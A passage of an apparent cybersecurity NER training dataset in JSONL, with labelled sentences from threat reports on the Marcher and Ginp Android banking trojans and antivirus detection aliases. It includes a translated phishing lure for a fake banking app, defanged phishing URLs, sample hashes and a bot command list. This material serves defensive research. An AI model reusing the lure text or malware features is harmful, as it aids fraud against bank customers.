{"MALWARE: Marcher": [[136, 143]]}, "info": {"id": "cyner_train_002679", "source": "cyner_train"}} {"text": "Analysis Marcher is frequently distributed via SMS , but in this case , victims are presented with a link in an email .", "spans": {"MALWARE: Marcher": [[9, 16]]}, "info": {"id": "cyner_train_002680", "source": "cyner_train"}} {"text": "Oftentimes , the emailed link is a bit.ly shortened link , used to potentially evade 
detection .", "spans": {}, "info": {"id": "cyner_train_002681", "source": "cyner_train"}} {"text": "Figure 1 : Landing page for phishing scheme asking for the victim ’ s signatory number and PIN using stolen branding from Bank Austria Because the actor delivered phishing links using the bit.ly URL shortener , we can access delivery statistics for this particular campaign .", "spans": {"SYSTEM: Bank Austria": [[122, 134]]}, "info": {"id": "cyner_train_002684", "source": "cyner_train"}} {"text": "The link resolves to a URL designed to appear legitimate , with a canonical domain of sicher97140 [ .", "spans": {}, "info": {"id": "cyner_train_002685", "source": "cyner_train"}} {"text": "] info including the “ bankaustria ” brand .", "spans": {}, "info": {"id": "cyner_train_002686", "source": "cyner_train"}} {"text": "Figure 2 : Bit.ly statistics for a phishing landing page targeting Bank Austria customers The actor appears to have recently begun using “ .top ” top-level domains ( TLDs ) for their phishing landing pages and have implemented a consistent naming structure as shown below .", "spans": {"SYSTEM: Bank Austria": [[67, 79]]}, "info": {"id": "cyner_train_002687", "source": "cyner_train"}} {"text": "Earlier this year , the actor used “ .pw ” TLDs while the Bank Austria scheme highlighted above used “ .info ” .", "spans": {"SYSTEM: Bank Austria": [[58, 70]]}, "info": {"id": "cyner_train_002688", "source": "cyner_train"}} {"text": "Some recent campaigns against other bank customers also used “ .gdn ” TLDs .", "spans": {}, "info": {"id": "cyner_train_002689", "source": "cyner_train"}} {"text": "Other attacks on Bank Austria customers that we observed resolved to the following .top domains : Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817062 [ .", "spans": {"SYSTEM: Bank Austria": [[17, 29]]}, "info": {"id": "cyner_train_002690", "source": "cyner_train"}} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817461 [ .", "spans": {}, "info": {"id": 
"cyner_train_002691", "source": "cyner_train"}} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817465 [ .", "spans": {}, "info": {"id": "cyner_train_002692", "source": "cyner_train"}} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817469 [ .", "spans": {}, "info": {"id": "cyner_train_002694", "source": "cyner_train"}} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58712 [ .", "spans": {}, "info": {"id": "cyner_train_002695", "source": "cyner_train"}} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58717 [ .", "spans": {}, "info": {"id": "cyner_train_002696", "source": "cyner_train"}} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58729 [ .", "spans": {}, "info": {"id": "cyner_train_002697", "source": "cyner_train"}} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87721 [ .", "spans": {}, "info": {"id": "cyner_train_002699", "source": "cyner_train"}} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87726 [ .", "spans": {}, "info": {"id": "cyner_train_002700", "source": "cyner_train"}} {"text": "] top/ These permutations of TLDs and canonical domains incorporating the legitimate domain expected by the targeted banking customers exemplifies recent trends in social engineering by threat actors .", "spans": {}, "info": {"id": "cyner_train_002701", "source": "cyner_train"}} {"text": "Just as threat actors may use stolen branding in their email lures to trick potential victims , they reproduce a legitimate domain name in a fraudulent domain that is not controlled by the bank .", "spans": {}, "info": {"id": "cyner_train_002702", "source": "cyner_train"}} {"text": "Figure 3 : Step two of the credential phish asking for the victim ’ s email address and phone number Having stolen the victim ’ s account and personal information , the scammer introduces a social engineering scheme , informing users that they currently do not have the “ Bank Austria Security App ” 
installed on their smartphone and must download it to proceed .", "spans": {"SYSTEM: Bank Austria Security App": [[272, 297]]}, "info": {"id": "cyner_train_002704", "source": "cyner_train"}} {"text": "Figure 4 shows the download prompt for this fake app ; an English translation follows .", "spans": {}, "info": {"id": "cyner_train_002705", "source": "cyner_train"}} {"text": "Figure 4 : Alert prompting the victim to download an Android banking app ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Dear Customer , The system has detected that the Bank Austria Security App is not installed on your smartphone .", "spans": {"SYSTEM: Android banking app": [[53, 72]], "SYSTEM: Bank Austria Security App": [[219, 244]]}, "info": {"id": "cyner_train_002706", "source": "cyner_train"}} {"text": "Due to new EU money laundering guidelines , the new Bank Austria security app is mandatory for all customers who have a mobile phone number in our system .", "spans": {"ORGANIZATION: EU": [[11, 13]], "SYSTEM: Bank Austria security app": [[52, 77]]}, "info": {"id": "cyner_train_002707", "source": "cyner_train"}} {"text": "Please install the app immediately to avoid blocking your account .", "spans": {}, "info": {"id": "cyner_train_002708", "source": "cyner_train"}} {"text": "Follow the instructions at the bottom of this page .", "spans": {}, "info": {"id": "cyner_train_002709", "source": "cyner_train"}} {"text": "Why you need the Bank Austria Security App : Due to outdated technology of the mobile network important data such as mTan SMS and online banking connections are transmitted unencrypted .", "spans": {"SYSTEM: Bank Austria Security App": [[17, 42]]}, "info": {"id": "cyner_train_002710", "source": "cyner_train"}} {"text": "Our security app allows us to transmit this sensitive data encrypted to you , thus increasing the security that you will not suffer any financial loss .", "spans": {}, "info": {"id": "cyner_train_002711", "source": 
"cyner_train"}} {"text": "Step 1 : Download Bank Austria Security App Download the Bank Austria security app to your Android device .", "spans": {"SYSTEM: Bank Austria Security App": [[18, 43]]}, "info": {"id": "cyner_train_002712", "source": "cyner_train"}} {"text": "* * * End translation * * * The phishing template then presents additional instructions for installing the fake security application ( Figure 5 ) : Figure 5 : Additional instructions telling the victim to give the app the requested permissions ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Step 2 : Allow installation Open your device 's settings , select Security or Applications ( depending on the device ) , and check Unknown sources .", "spans": {}, "info": {"id": "cyner_train_002714", "source": "cyner_train"}} {"text": "After successful installation , tap Open and enable the device administrator .", "spans": {}, "info": {"id": "cyner_train_002716", "source": "cyner_train"}} {"text": "* * * End translation * * * Referring again to bit.ly , we can see click statistics for this campaign ( Figure 6 ) .", "spans": {}, "info": {"id": "cyner_train_002718", "source": "cyner_train"}} {"text": "Figure 6 : bit.ly statistics for the fake Bank Austria Android app download link From this small sample , we see that 7 % of visitors clicked through to download the application , which is actually a version of the Marcher banking Trojan named “ BankAustria.apk ” , continuing the fraudulent use of the bank ’ s branding to fool potential victims .", "spans": {"SYSTEM: Bank Austria Android app": [[42, 66]], "MALWARE: Marcher banking Trojan": [[215, 237]]}, "info": {"id": "cyner_train_002719", "source": "cyner_train"}} {"text": "This sample is similar to those presented in other recent Marcher analyses [ 1 ] [ 2 ] .", "spans": {"MALWARE: Marcher": [[58, 65]]}, "info": {"id": "cyner_train_002720", "source": "cyner_train"}} {"text": "This particular application is signed 
with a fake certificate : Owner : CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Issuer CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Serial : 1c9157d7 Validity : 11/02/2017 00:16:46 03/20/2045 00:16:46 MD5 Hash : A8:55:46:32:15", "spans": {}, "info": {"id": "cyner_train_002721", "source": "cyner_train"}} {"text": ": A9 : D5:95 : A9:91 : C2:91:77:5D:30 : F6 SHA1 Hash : 32:17 : E9:7E:06 : FE:5D:84 : BE:7C:14:0C : C6:2B:12:85 : E7:03:9A:5F The app requests extensive permissions during installation that enable a range of activities supported by the malware .", "spans": {}, "info": {"id": "cyner_train_002722", "source": "cyner_train"}} {"text": "Allows an application to read from external storage .", "spans": {}, "info": {"id": "cyner_train_002724", "source": "cyner_train"}} {"text": "Allows an application to use SIP service .", "spans": {}, "info": {"id": "cyner_train_002725", "source": "cyner_train"}} {"text": "Allows an application to send SMS messages .", "spans": {}, "info": {"id": "cyner_train_002728", "source": "cyner_train"}} {"text": "Allows an application to initiate a phone call without going through the Dialer user interface for the user to confirm the call .", "spans": {}, "info": {"id": "cyner_train_002731", "source": "cyner_train"}} {"text": "Allows applications to access information about networks .", "spans": {}, "info": {"id": "cyner_train_002732", "source": "cyner_train"}} {"text": "Allows an application to read the user 's contacts data .", "spans": {}, "info": {"id": "cyner_train_002734", "source": "cyner_train"}} {"text": "Allows an application to read or write the system settings .", "spans": {}, "info": {"id": "cyner_train_002735", "source": "cyner_train"}} {"text": "Allows applications to change Wi-Fi connectivity state .", "spans": {}, "info": {"id": "cyner_train_002737", "source": "cyner_train"}} {"text": "Allows applications to change network connectivity state .", "spans": {}, "info": 
{"id": "cyner_train_002738", "source": "cyner_train"}} {"text": "Analysis of the malware shows that it uses the common string obfuscation of character replacement ( Figure 7 ) : Figure 7 : Encoded Marcher Strings Figure 8 : Decoded Marcher Strings As noted , the application requests extensive permissions during installation ; Figure 9 shows the request to act as device administrator , a particular permission that should very rarely be granted to an app .", "spans": {"MALWARE: Marcher": [[132, 139], [167, 174]]}, "info": {"id": "cyner_train_002739", "source": "cyner_train"}} {"text": "Figure 9 : Prompt for application permissions upon installation Figures 10 and 11 show the other permission screens for the app : Figure 10 Figure 10 : Part 1 of the permission screen for the app Figure 11 : Part 2 of the permission screen for the app Once installed the app will place a legitimate looking icon on the phone ’ s home screen , again using branding stolen from the bank .", "spans": {}, "info": {"id": "cyner_train_002740", "source": "cyner_train"}} {"text": "Figure 12 : Fake Bank Austria Security application icon In addition to operating as a banking Trojan , overlaying a legitimate banking app with an indistinguishable credential theft page , the malware also asks for credit card information from the user when they open applications such as the Google Play store .", "spans": {"SYSTEM: Fake Bank Austria Security application": [[12, 50]], "SYSTEM: Google Play": [[293, 304]]}, "info": {"id": "cyner_train_002741", "source": "cyner_train"}} {"text": "Figure 13 : Popup asking for a credit card number The application also supports stealing credit card verification information ( Figures 14 and 15 ) .", "spans": {}, "info": {"id": "cyner_train_002742", "source": "cyner_train"}} {"text": "A review of the bit.ly statistics for these campaigns shows that they were at least as effective in driving end-user clicks as the Bank Austria campaign analyzed above .", "spans": {"SYSTEM: Bank 
Austria": [[131, 143]]}, "info": {"id": "cyner_train_002744", "source": "cyner_train"}} {"text": "Conclusion As our computing increasingly crosses multiple screens , we should expect to see threats extending across mobile and desktop environments .", "spans": {}, "info": {"id": "cyner_train_002745", "source": "cyner_train"}} {"text": "As on the desktop , mobile users need to be wary of installing applications from outside of legitimate app stores and sources and be on the lookout for bogus banking sites that ask for more information than users would normally provide on legitimate sites .", "spans": {}, "info": {"id": "cyner_train_002747", "source": "cyner_train"}} {"text": "Unusual domains , the use of URL shorteners , and solicitations that do not come from verifiable sources are also red flags for potential phishing and malware .", "spans": {}, "info": {"id": "cyner_train_002748", "source": "cyner_train"}} {"text": "It is still under active development , with at least 5 different versions of the Trojan released within the last 5 months ( June - November 2019 ) .", "spans": {}, "info": {"id": "cyner_train_002751", "source": "cyner_train"}} {"text": "In addition , its original target list is extremely narrow and seems to be focused on Spanish banks .", "spans": {}, "info": {"id": "cyner_train_002753", "source": "cyner_train"}} {"text": "At that time , Ginp was a simple SMS stealer whose purpose was only to send a copy of incoming and outgoing SMS messages to the C2 server .", "spans": {"MALWARE: Ginp": [[15, 19]]}, "info": {"id": "cyner_train_002757", "source": "cyner_train"}} {"text": "A couple of months later , in August 2019 , a new version was released with additional banking-specific features .", "spans": {}, "info": {"id": "cyner_train_002758", "source": "cyner_train"}} {"text": "This and following versions were masquerading as fake “ Adobe Flash Player ” apps .", "spans": {"SYSTEM: Adobe Flash Player": [[56, 74]]}, "info": {"id": "cyner_train_002759", 
"source": "cyner_train"}} {"text": "Although early versions had some basic code and string obfuscation , protection of the third version of the malware was enhanced with the use of payload obfuscation .", "spans": {}, "info": {"id": "cyner_train_002762", "source": "cyner_train"}} {"text": "The capabilities remained unchanged , but a new endpoint was added to the Trojan C2 allowing it to handle the generic card grabber overlay and specific target overlays ( banking apps ) separately .", "spans": {}, "info": {"id": "cyner_train_002763", "source": "cyner_train"}} {"text": "In addition , the credit card grabber target list was expanded with Snapchat and Viber .", "spans": {"SYSTEM: Snapchat": [[68, 76]], "SYSTEM: Viber": [[81, 86]]}, "info": {"id": "cyner_train_002764", "source": "cyner_train"}} {"text": "In the third version spotted in the wild , the author introduced parts of the source code of the infamous Anubis Trojan ( which was leaked earlier in 2019 ) .", "spans": {"MALWARE: Anubis": [[106, 112]]}, "info": {"id": "cyner_train_002765", "source": "cyner_train"}} {"text": "This version has some small modifications which seems to be unused , as the malware behaviour is the same as the previous version .", "spans": {}, "info": {"id": "cyner_train_002771", "source": "cyner_train"}} {"text": "Additionally new endpoint was added that seems related to downloading a module for the malware , probably with new features or configuration .", "spans": {}, "info": {"id": "cyner_train_002773", "source": "cyner_train"}} {"text": "How it works When the malware is first started on the device it will begin by removing its icon from the app drawer , hiding from the end user .", "spans": {}, "info": {"id": "cyner_train_002774", "source": "cyner_train"}} {"text": "In the second step it asks the victim for the Accessibility Service privilege as visible in following screenshot : Ginp Accessibility request Once the user grants the requested Accessibility Service privilege , Ginp starts 
by granting itself additional permissions , such as ( dynamic ) permissions required in order to be able to send messages and make calls , without requiring any further action from the victim .", "spans": {"MALWARE: Ginp": [[115, 119], [211, 215]]}, "info": {"id": "cyner_train_002775", "source": "cyner_train"}} {"text": "When done , the bot is functional and ready to receive commands and perform overlay attacks .", "spans": {}, "info": {"id": "cyner_train_002776", "source": "cyner_train"}} {"text": "The commands supported by the most recent version of the bot are listed below .", "spans": {}, "info": {"id": "cyner_train_002777", "source": "cyner_train"}} {"text": "As can be observed , the possibilities offered by the bot are pretty common .", "spans": {}, "info": {"id": "cyner_train_002778", "source": "cyner_train"}} {"text": "Command Description SEND_SMS Send an SMS from the bot to a specific number NEW_URL Update the C2 URL KILL Disable the bot PING_DELAY Update interval between each ping request CLEAN_IGNORE_PKG Empty list of overlayed apps WRITE_INJECTS Update target list READ_INJECTS Get current target list START_ADMIN Request Device Admin privileges ALL_SMS Get all SMS messages DISABLE_ACCESSIBILITY Stop preventing user from disabling the accessibility service ENABLE_ACCESSIBILITY Prevent user from disabling", "spans": {}, "info": {"id": "cyner_train_002779", "source": "cyner_train"}} {"text": "the accessibility service ENABLE_HIDDEN_SMS Set malware as default SMS app DISABLE_HIDDEN_SMS Remove malware as default SMS app ENABLE_EXTENDED_INJECT Enable overlay attacks DISABLE_EXTENDED_INJECT Disable overlay attacks ENABLE_CC_GRABBER Enable the Google Play overlay DISABLE_CC_GRABBER Disable the Google Play overlay START_DEBUG Enable debugging GET_LOGCAT Get logs from the device STOP_DEBUG Disable debugging GET_APPS", "spans": {"SYSTEM: Google Play": [[251, 262], [302, 313]]}, "info": {"id": "cyner_train_002780", "source": "cyner_train"}} {"text": "Get installed 
applications GET_CONTACTS Get contacts SEND_BULK_SMS Send SMS to multiple numbers UPDATE_APK Not implemented INJECT_PACKAGE Add new overlay target CALL_FORWARD Enable/disable call forwarding START_PERMISSIONS Starts request for additional permissions ( Accessibility privileges , battery optimizations bypass , dynamic permissions ) Features The most recent version of Ginp has the same capabilities as most other Android banking Trojans , such as the use of overlay attacks , SMS control and contact", "spans": {"SYSTEM: Android": [[428, 435]]}, "info": {"id": "cyner_train_002781", "source": "cyner_train"}} {"text": "Overall , it has a fairly common feature list , but it is expected to expand in future updates .", "spans": {}, "info": {"id": "cyner_train_002783", "source": "cyner_train"}} {"text": "Since Ginp is already using some code from the Anubis Trojan , it is quite likely that other , more advanced features from Anubis or other malware , such as a back-connect proxy , screen-streaming and RAT will also be added in the future .", "spans": {"MALWARE: Anubis": [[47, 53]], "SYSTEM: Anubis": [[123, 129]]}, "info": {"id": "cyner_train_002784", "source": "cyner_train"}} {"text": "Ginp embeds the following set of features , allowing it to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( local overlays obtained from the C2 ) SMS harvesting : SMS listing SMS harvesting : SMS forwarding Contact list collection Application listing Overlaying : Targets list update SMS : Sending Calls : Call forwarding C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Update", "spans": {"MALWARE: Ginp": [[0, 4]]}, "info": {"id": "cyner_train_002785", "source": "cyner_train"}} {"text": "10/03/2020 At the end of February the actors behind Ginp added screen capture capabilities to their Trojan .", "spans": {"MALWARE: Ginp": [[52, 56]]}, "info": {"id": 
"cyner_train_002786", "source": "cyner_train"}} {"text": "Like previously added functionality , the code is borrowed from the leaked Anubis Trojan source code .", "spans": {"MALWARE: Anubis": [[75, 81]]}, "info": {"id": "cyner_train_002787", "source": "cyner_train"}} {"text": "It enables the bot to stream screenshots and send them to the C2 so that actors can see what is happening on the screen of the infected device .", "spans": {}, "info": {"id": "cyner_train_002788", "source": "cyner_train"}} {"text": "Overlay attack Ginp uses the Accessibility Service to check which application runs is the foreground .", "spans": {}, "info": {"id": "cyner_train_002789", "source": "cyner_train"}} {"text": "If the package name of the foreground app is included in the target list , an overlay is shown .", "spans": {}, "info": {"id": "cyner_train_002790", "source": "cyner_train"}} {"text": "The WebView-based overlay is loading an HTML page provided by the C2 in response to the package name provided by the bot .", "spans": {}, "info": {"id": "cyner_train_002791", "source": "cyner_train"}} {"text": "Something that makes Ginp special is that all of its overlay screens for banking apps are consist of multiple steps , first stealing the victim ’ s login credentials , then stealing the credit card details ( to “ validate ” the user identity ) , as shown in the screenshots hereafter : The following code snippet shows that after the second overlay is filled-in and validated , it disappears and the targeted application is added to the list of packages names to be ignored for future overlays attacks .", "spans": {"MALWARE: Ginp": [[21, 25]]}, "info": {"id": "cyner_train_002792", "source": "cyner_train"}} {"text": "Still included in the last versions , this screen is only used to overlay the official Google Play Store app .", "spans": {"SYSTEM: Google Play Store": [[87, 104]]}, "info": {"id": "cyner_train_002794", "source": "cyner_train"}} {"text": "More apps could be added to the grabber 
target list in the future , such as the ones that were targeted in older versions : Facebook WhatsApp Skype Twitter Chrome Instagram Snapchat Viber The following screenshot shows the generic card grabber overlay screen : Ginp generic grabber The current active target list is available in the appendix , containing a total of 24 unique targets .", "spans": {"SYSTEM: Facebook": [[124, 132]], "SYSTEM: WhatsApp": [[133, 141]], "SYSTEM: Skype": [[142, 147]], "SYSTEM: Twitter": [[148, 155]], "SYSTEM: Chrome": [[156, 162]], "SYSTEM: Instagram": [[163, 172]], "SYSTEM: Snapchat": [[173, 181]], "SYSTEM: Viber": [[182, 187]], "MALWARE: Ginp": [[261, 265]]}, "info": {"id": "cyner_train_002795", "source": "cyner_train"}} {"text": "When analyzing the Ginp ’ s recent samples , ThreatFabric analysts found some similarities with the famous Android banking Trojan .", "spans": {"MALWARE: Ginp": [[19, 23]], "SYSTEM: ThreatFabric": [[45, 57]]}, "info": {"id": "cyner_train_002797", "source": "cyner_train"}} {"text": "Based on the evolution of Ginp it is clear that it isn ’ t based on Anubis , but rather reuses some of its code .", "spans": {"MALWARE: Ginp": [[26, 30]], "MALWARE: Anubis": [[68, 74]]}, "info": {"id": "cyner_train_002798", "source": "cyner_train"}} {"text": "Below are some of the elements showing the relation .", "spans": {}, "info": {"id": "cyner_train_002799", "source": "cyner_train"}} {"text": "The names used for Android components are similar : Similarities with AnubisSimilarities with Anubis When analyzing these components , similarities were found in the code of both malware families : Similarities with Anubis Another major change that indicated that the actor copied code from the Anubis Trojan is the way of handling configuration values .", "spans": {"SYSTEM: Android": [[19, 26]], "MALWARE: Anubis": [[94, 100], [295, 301]], "SYSTEM: Anubis": [[216, 222]]}, "info": {"id": "cyner_train_002800", "source": "cyner_train"}} {"text": "Previous versions were storing config 
values within the variables of a class , while the latest version is using SharedPreferences with some of the keys being identical to those used by Anubis : isAccessibility time_work time_start_permission url_inj Conclusion Ginp is a simple but rather efficient banking Trojan providing the basic functionality to be able to trick victims into delivering personal information .", "spans": {"SYSTEM: Anubis": [[186, 192]], "MALWARE: Ginp": [[262, 266]]}, "info": {"id": "cyner_train_002801", "source": "cyner_train"}} {"text": "In a 5-month timespan , actor managed to create a Trojan from scratch which will presumably continue evolving offering new features such as keylogging , back-connect proxy or RAT capabilities .", "spans": {}, "info": {"id": "cyner_train_002802", "source": "cyner_train"}} {"text": "Ginp ’ s unusual target selection is not just about its focus on Spanish banks but also the wide selection of targeted apps per bank .", "spans": {"MALWARE: Ginp": [[0, 4]]}, "info": {"id": "cyner_train_002803", "source": "cyner_train"}} {"text": "The fact that the overlay screens are almost identical to the legitimate banking apps suggests that the actors might be very familiar with the Spanish banking applications and might even be accustomed to the language .", "spans": {}, "info": {"id": "cyner_train_002804", "source": "cyner_train"}} {"text": "Although the current target list is limited to Spanish apps , it seems that the actor is taking into account that the bot should also be able to target other countries , seeing that the path used in the inject requests contains the country code of the targeted institution .", "spans": {}, "info": {"id": "cyner_train_002805", "source": "cyner_train"}} {"text": "This could indicate that actor already has plans in expanding the targets to applications from different countries and regions .", "spans": {}, "info": {"id": "cyner_train_002806", "source": "cyner_train"}} {"text": "Appendix Samples Some of the latest Ginp samples found 
in the wild : App name Package name SHA-256 hash Google Play Verificator sing.guide.false 0ee075219a2dfde018f17561467272633821d19420c08cba14322cc3b93bb5d5 Google Play Verificator park.rather.dance 087a3beea46f3d45649b7506073ef51c784036629ca78601a4593759b253d1b7 Adobe Flash Player ethics.unknown.during", "spans": {"MALWARE: Ginp": [[36, 40]], "SYSTEM: Google Play Verificator": [[104, 127], [210, 233]], "SYSTEM: park.rather.dance": [[234, 251]], "SYSTEM: Adobe Flash Player": [[317, 335]]}, "info": {"id": "cyner_train_002807", "source": "cyner_train"}} {"text": "5ac6901b232c629bc246227b783867a0122f62f9e087ceb86d83d991e92dba2f Adobe Flash Player solution.rail.forward 7eb239cc86e80e6e1866e2b3a132b5af94a13d0d24f92068a6d2e66cfe5c2cea Adobe Flash Player com.pubhny.hekzhgjty 14a1b1dce69b742f7e258805594f07e0c5148b6963c12a8429d6e15ace3a503c", "spans": {"SYSTEM: Adobe Flash Player": [[65, 83], [171, 189]]}, "info": {"id": "cyner_train_002808", "source": "cyner_train"}} {"text": "Adobe Flash Player sentence.fancy.humble 78557094dbabecdc17fb0edb4e3a94bae184e97b1b92801e4f8eb0f0626d6212 Target list The current list of apps observed to be targeted by Ginp contains a total of 24 unique applications as seen below .", "spans": {"SYSTEM: Adobe Flash Player": [[0, 18]], "MALWARE: Ginp": [[170, 174]]}, "info": {"id": "cyner_train_002809", "source": "cyner_train"}} {"text": "This list is expected to grow in the future .", "spans": {}, "info": {"id": "cyner_train_002810", "source": "cyner_train"}} {"text": "We believe the TelePort Crew Threat Actor is operating out of Russia or Eastern Europe with the groups major motivations appearing to be financial in nature through cybercrime and/or corporate espionage.", "spans": {"THREAT_ACTOR: TelePort Crew Threat Actor": [[15, 41]], "THREAT_ACTOR: groups": [[96, 102]], "ORGANIZATION: financial": [[137, 146]], "THREAT_ACTOR: cybercrime": [[165, 175]], "THREAT_ACTOR: corporate espionage.": [[183, 203]]}, "info": {"id": "cyner2_train_000000", 
"source": "cyner2_train"}} {"text": "The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims.", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: the OilRig campaign": [[17, 36]], "MALWARE: malicious Microsoft Excel documents": [[86, 121]], "ORGANIZATION: victims.": [[136, 144]]}, "info": {"id": "cyner2_train_000001", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.WebToos.A6 Trojan.Gadoopt.Win64.4 Trojan/Gadoopt.aa Win64.Backdoor.Gadoopt.b TROJ_WEBTOOS_EL150244.UVPM Win.Trojan.Win64-93 BackDoor.Gates.19 TROJ_WEBTOOS_EL150244.UVPM TR/Gadoopt.maz Trojan:Win32/WebToos.A Win64/Gadoopt.AA Trojan.Win32.WebToos", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000003", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clodc4c.Trojan.f31e Win32.Packed.VMProtect.a Trojan.Win32.Zapchast.ajbs Trojan.Win32.Black.elkboj Trojan.Win32.Z.Vmprotbad.242576[h] W32/Trojan.TYMW-2040 Trojan/Win32.PcClient.R191990 Trojan.VMProtect! 
Trojan.Win32.VMProtect Trj/CI.A Win32/Trojan.f26", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000005", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9952 PWS:MSIL/Bahmajip.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000007", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.Radminer!O TrojanDropper.Small.PQ4 Worm.Radminer.Win32.8 Trojan/Radmin.b TROJ_SPNR.03EF12 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.XJGC-7764 Remacc.Radmin TROJ_SPNR.03EF12 Dos.Trojan.RAdmin-17 Trojan-Dropper.RadmIns Worm.Win32.Radminer.d Trojan.Win32.Radminer.dxpafi Worm.Win32.A.Radminer.307200 Trojan.DownLoader9.15517 BehavesLike.Win32.Skintrim.fh W32/Trojan2.OCDS Trojan[RemoteAdmin]/Win32.RAdmin Backdoor:Win32/Radmin.B Worm.Win32.Radminer.d Trojan/Win32.RAdmin.R103271 Trj/CI.A Trojan.Radmin.B Win32/Radmin.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000009", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Antavmu.Win32.50 Trojan/Antavmu.ejw Trojan.Heur2.RP.E5C8CC Win32.Trojan.WisdomEyes.16070401.9500.9564 W32/Trojan2.IKTO Downloader.Trojan Win.Trojan.Antavmu-74 Trojan-Downloader.Win32.Murlo.vqg Trojan.Win32.Antavmu.wseg Spyware.Antavmu.455005 TrojWare.Win32.Antavmu.~bar Trojan.1 Trojan.Win32.Antavmu W32/Trojan.ASFC-3590 Trojan.Antavmu.y Troj.W32.Antavmu.jf!c Trojan-Downloader.Win32.Murlo.vqg Trojan/Win32.Antavmu.R18411 Trojan.1 Trojan.Antavmu!m7hjC7OtKPY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000010", "source": "cyner2_train"}} {"text": "A new online banking malware with the same technique used in Operation Emmental has been hitting users in Japan.", "spans": {"MALWARE: banking malware": [[13, 28]], "THREAT_ACTOR: Operation Emmental": [[61, 79]]}, "info": {"id": "cyner2_train_000014", "source": "cyner2_train"}} {"text": "The name of this injector is based 
on its version information which is the same for both dotRunpeX versions, consistent across all samples we analyzed and containing ProductName – RunpeX.Stub.Framework.", "spans": {"MALWARE: injector": [[17, 25]], "MALWARE: dotRunpeX versions,": [[89, 108]], "MALWARE: ProductName": [[166, 177]]}, "info": {"id": "cyner2_train_000017", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_DROPPER.FK Win32.Trojan.WisdomEyes.16070401.9500.9995 Infostealer.Gampass TROJ_DROPPER.FK Trojan.Win32.XDR.euxmtw Trojan.MulDrop.18385 BehavesLike.Win32.Virut.cc Win32.Infect.a.124448 Win32/Trojan.5f3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000020", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Delfsnif W32/Backdoor2.GYBX Backdoor.Trojan Trojan.Win32.Delphi.bjxrjc BehavesLike.Win32.Rontokbro.dm W32/Backdoor.XFVH-7108 Backdoor.Delfsnif Trj/CI.A Win32.Trojan.Crypt.Alih Hoax.Win32.BadJoke.FakeKAV Win32/Trojan.160", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000022", "source": "cyner2_train"}} {"text": "However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA.", "spans": {"ORGANIZATION: nations": [[59, 66]]}, "info": {"id": "cyner2_train_000023", "source": "cyner2_train"}} {"text": "The documents were found to drop the following malware families: The previously discussed CONFUCIUS_B malware family A backdoor previously not discussed in the public domain, commonly detected by some antivirus solutions as BioData A previously unknown backdoor that we have named MY24", "spans": {"MALWARE: malware families:": [[47, 64]], "MALWARE: CONFUCIUS_B malware family": [[90, 116]], "MALWARE: backdoor": [[119, 127]], "SYSTEM: antivirus solutions": [[201, 220]], "MALWARE: unknown backdoor": [[245, 261]], "MALWARE: MY24": [[281, 285]]}, "info": {"id": "cyner2_train_000025", "source": "cyner2_train"}} {"text": "The spammed attachments are using 
a RTF trick or a feature of Windows OS that allows dropping an executable – but not running it – simply by opening the RTF document", "spans": {}, "info": {"id": "cyner2_train_000027", "source": "cyner2_train"}} {"text": "Every sample we found was different in size and activity from the others but the internal name and other identifiers were disturbingly similar.", "spans": {}, "info": {"id": "cyner2_train_000029", "source": "cyner2_train"}} {"text": "The malware disguises itself as a file helper app and then uses very advanced anti-debug and anti-hook techniques to prevent it from being reverse engineered.", "spans": {"MALWARE: malware": [[4, 11]]}, "info": {"id": "cyner2_train_000030", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.KillAV.60689 Packed.Win32.TDSS!O Trojan.KillAV.Win32.3036 Trojan/KillAV.caq W32/Trojan2.GLAK Infostealer.Onlinegame Trojan.Win32.KillAV.60689 TrojWare.Win32.Patched.KSU Trojan.Click.28899 Trojan.1 W32/Trojan.ANJW-2244 Trojan/KillAV.qx Worm:Win32/QQnof.A Trojan.Zusy.D1B0EC Troj.W32.KillAV.caq!c Trojan/Win32.KillAV.C155326 Trojan.1 Trojan.Win32.Jhee W32/KillAV.CAQ!tr Trj/KillAV.FJ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000031", "source": "cyner2_train"}} {"text": "A backdoor also known as: 